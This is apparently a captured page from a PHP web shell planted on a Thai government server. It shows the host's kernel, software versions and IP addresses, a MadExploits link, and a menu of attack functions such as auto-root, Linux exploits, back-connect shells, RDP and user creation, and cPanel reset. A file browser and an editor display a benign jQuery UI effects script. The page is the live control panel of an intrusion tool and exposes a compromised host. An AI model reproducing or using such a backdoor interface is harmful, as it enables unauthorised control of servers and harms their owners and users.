Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss_test /
jquery /
ui /
[ HOME SHELL ]
Name
Size
Permission
Action
i18n
[ DIR ]
drwxr-xr-x
minified
[ DIR ]
drwxr-xr-x
jquery-ui-1.8.13.custom.js
362.09
KB
-rw-r--r--
jquery.effects.blind.js
1.35
KB
-rw-r--r--
jquery.effects.bounce.js
2.99
KB
-rw-r--r--
jquery.effects.clip.js
1.64
KB
-rw-r--r--
jquery.effects.core.js
22.37
KB
-rw-r--r--
jquery.effects.drop.js
1.62
KB
-rw-r--r--
jquery.effects.explode.js
2.32
KB
-rw-r--r--
jquery.effects.fade.js
691
B
-rw-r--r--
jquery.effects.fold.js
1.86
KB
-rw-r--r--
jquery.effects.highlight.js
1.17
KB
-rw-r--r--
jquery.effects.pulsate.js
1.19
KB
-rw-r--r--
jquery.effects.scale.js
6.78
KB
-rw-r--r--
jquery.effects.shake.js
1.89
KB
-rw-r--r--
jquery.effects.slide.js
1.62
KB
-rw-r--r--
jquery.effects.transfer.js
1.1
KB
-rw-r--r--
jquery.ui.accordion.js
15.88
KB
-rw-r--r--
jquery.ui.autocomplete.js
16.14
KB
-rw-r--r--
jquery.ui.button.js
10.14
KB
-rw-r--r--
jquery.ui.core.js
8.02
KB
-rw-r--r--
jquery.ui.datepicker.js
73.38
KB
-rw-r--r--
jquery.ui.dialog.js
21.3
KB
-rw-r--r--
jquery.ui.draggable.js
29.71
KB
-rw-r--r--
jquery.ui.droppable.js
9.24
KB
-rw-r--r--
jquery.ui.mouse.js
4.1
KB
-rw-r--r--
jquery.ui.position.js
7.17
KB
-rw-r--r--
jquery.ui.progressbar.js
2.32
KB
-rw-r--r--
jquery.ui.resizable.js
25.78
KB
-rw-r--r--
jquery.ui.selectable.js
6.68
KB
-rw-r--r--
jquery.ui.slider.js
17.18
KB
-rw-r--r--
jquery.ui.sortable.js
39.01
KB
-rw-r--r--
jquery.ui.tabs.js
20.75
KB
-rw-r--r--
jquery.ui.widget.js
6.7
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.effects.shake.js
/* * jQuery UI Effects Shake 1.8.13 * * Copyright 2011, AUTHORS.txt (http://jqueryui.com/about) * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * http://docs.jquery.com/UI/Effects/Shake * * Depends: * jquery.effects.core.js */ (function( $, undefined ) { $.effects.shake = function(o) { return this.queue(function() { // Create element var el = $(this), props = ['position','top','bottom','left','right']; // Set options var mode = $.effects.setMode(el, o.options.mode || 'effect'); // Set Mode var direction = o.options.direction || 'left'; // Default direction var distance = o.options.distance || 20; // Default distance var times = o.options.times || 3; // Default # of times var speed = o.duration || o.options.duration || 140; // Default speed per shake // Adjust $.effects.save(el, props); el.show(); // Save & Show $.effects.createWrapper(el); // Create Wrapper var ref = (direction == 'up' || direction == 'down') ? 'top' : 'left'; var motion = (direction == 'up' || direction == 'left') ? 'pos' : 'neg'; // Animation var animation = {}, animation1 = {}, animation2 = {}; animation[ref] = (motion == 'pos' ? '-=' : '+=') + distance; animation1[ref] = (motion == 'pos' ? '+=' : '-=') + distance * 2; animation2[ref] = (motion == 'pos' ? '-=' : '+=') + distance * 2; // Animate el.animate(animation, speed, o.options.easing); for (var i = 1; i < times; i++) { // Shakes el.animate(animation1, speed, o.options.easing).animate(animation2, speed, o.options.easing); }; el.animate(animation1, speed, o.options.easing). animate(animation, speed / 2, o.options.easing, function(){ // Last shake $.effects.restore(el, props); $.effects.removeWrapper(el); // Restore if(o.callback) o.callback.apply(this, arguments); // Callback }); el.queue('fx', function() { el.dequeue(); }); el.dequeue(); }); }; })(jQuery);
Close